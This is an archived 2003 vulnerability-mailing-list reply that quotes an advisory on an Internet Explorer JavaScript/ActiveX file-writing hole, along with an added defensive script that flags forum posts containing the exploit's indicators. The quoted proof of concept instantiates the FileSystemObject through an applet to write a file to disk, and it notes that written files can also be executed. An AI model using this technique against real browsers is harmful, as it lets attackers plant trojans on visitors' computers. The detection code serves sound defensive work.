Vulnerability Development mailing list archives
Re: Internet Explorer JavaScript insecure function
From: npguy <npguy () websurfer com np>
Date: Tue, 9 Dec 2003 08:01:10 +0545
Hi freebrain,

exploit not working in ie6. urs `Proof of concept` require `applet` in html.
could u please post an html?

Sunday, December 7, 2003, 8:41:57 PM, you wrote:

F> * Internet Explorer JavaScript insecure function *
F> Product: Microsoft Internet Explorer
F> Version: 5.x (probably other versions may be affected)
F> ***
F> Problem:
F> I discovered a javascript function (interpreted by Internet Explorer) called
F> "file.writeline()" may be potentially dangerous for Internet Explorer users.
F> This function allows to write files by means of JavaScript on a hard disk.
F> An attacker may use this function writing JavaScript code in posts of
F> forums, guestbooks, etc for owning his victim's computers. With
F> "file.writeline()" function the attacker can write trojans/virus/etc on his
F> victim's hard disks, for example, an attacker may use JavaScript
F> "file.writeline()" function for writing a malicious file in VBS (Visual
F> Basic Scripting) language.
F> I repeat, this may be potentially dangerous for Internet Explorer users.
F> NOTE: Actually a virus in the wild that affects to mIRC users is using this
F> function ("file.writeline").
F> NOTE2: As you can see on the "Proof of concept", other functions are needed
F> to carry out an "intrusion".
F> ***
F> Proof of concept:
F> InterfaceObject=document.applets[0];
F> setTimeout("Write()",1000);
F> function Write() {
F> fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
F> InterfaceObject.setCLSID(fsoClassID);
F> fso = InterfaceObject.createInstance();
F> // windir = fso.getspecialfolder ;
F> filename = "\\proof.txt";
F> var filecontent = "Hello world";
F> file = fso.opentextfile(filename, "2", "TRUE");
F> file.writeline(filecontent)
F> file.close();
F> }
F> This code writes a file called "proof.txt" in the hard disk, with the
F> content "Hello world". Also you can execute files you write by means of
F> JavaScript adding "Run();" to the function.
F> ***
F> Solution:
F> I'm not sure about the solution but I recommend to upgrade to the last
F> version of Internet Explorer.
F> Also I recommend webmasters to forbid HTML codes that contain this function
F> in their forums, guestbooks, etc.
F> ***
F> Thanks to:
F> #disidents,#hackers,#hacker @ irc-phoenix.org
F> #disidents,#sleepx,#ayuda_internet @ irc-hispano.org
F> Special thanks go to: Impos, |_Tr0mP4s
F> (sorry my poor english)
F> ***
F> By FREEBRAIN
F> FREEBRAIN is a member of DisidentS Hacker Team
F> http://disidents-team.cjb.net (under construction) -
F> http://www.gratisweb.com/disidents
F> <freebrain () unionnewbies net> ( www.unionnewbies.net )
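Added example (not part of the original posts, and not code from either poster): one way a forum or guestbook could act on the "Solution" advice above, flagging submissions that carry the strings visible in the quoted proof of concept. It goes beyond that advice by also escaping the post on output, so a missed indicator is still rendered as text. The function names, indicator labels and sample posts are hypothetical and constructed for illustration.

```javascript
// Added example: names below are hypothetical, not from the original posts.
// Indicators are strings visible in the quoted proof of concept.
const INDICATORS = [
  ["fso-clsid", /0D43FE01-F093-11CF-8940-00A0C9054228/i],
  ["applet-tag", /<\s*applet\b/i],
  ["script-tag", /<\s*script\b/i],
  ["setCLSID", /\bsetCLSID\s*\(/i],
  ["createInstance", /\bcreateInstance\s*\(/i],
  ["opentextfile", /\bopentextfile\s*\(/i],
  ["writeline", /\bwriteline\s*\(/i],
];

// Decode numeric character references so an indicator written with
// "&#119;" in place of "w" is matched like its plain spelling.
function decodeNumericEntities(text) {
  const toChar = (cp) => (cp <= 0x10ffff ? String.fromCodePoint(cp) : "");
  return text
    .replace(/&#x([0-9a-f]{1,6});?/gi, (_, h) => toChar(parseInt(h, 16)))
    .replace(/&#([0-9]{1,7});?/g, (_, d) => toChar(parseInt(d, 10)));
}

// Escape for output so a stored post is rendered as text, never as markup.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Returns the indicator names found (for logging or moderation) together
// with the escaped body that is safe to place in the page.
function screenPost(body) {
  const decoded = decodeNumericEntities(body);
  const hits = INDICATORS
    .filter(([, re]) => re.test(body) || re.test(decoded))
    .map(([name]) => name);
  return { hits, rendered: escapeHtml(body) };
}

// Constructed sample submissions.
const SAMPLES = [
  'Nice site! <applet></applet><script>o.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")</script>',
  'x = file.&#119;riteline("a")',
  "How do I call writeline from a WSH script?",
];
for (const s of SAMPLES) console.log(screenPost(s).hits);
```

The indicator list is useful for alerting and moderation; the escaping in `rendered` is what keeps a post from being interpreted as markup.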
Current thread:
- Internet Explorer JavaScript insecure function FREEBRAIN (Dec 08)
- Re: Internet Explorer JavaScript insecure function npguy (Dec 09)
- <Possible follow-ups>
- RE: Internet Explorer JavaScript insecure function Scovetta, Michael V (Dec 08)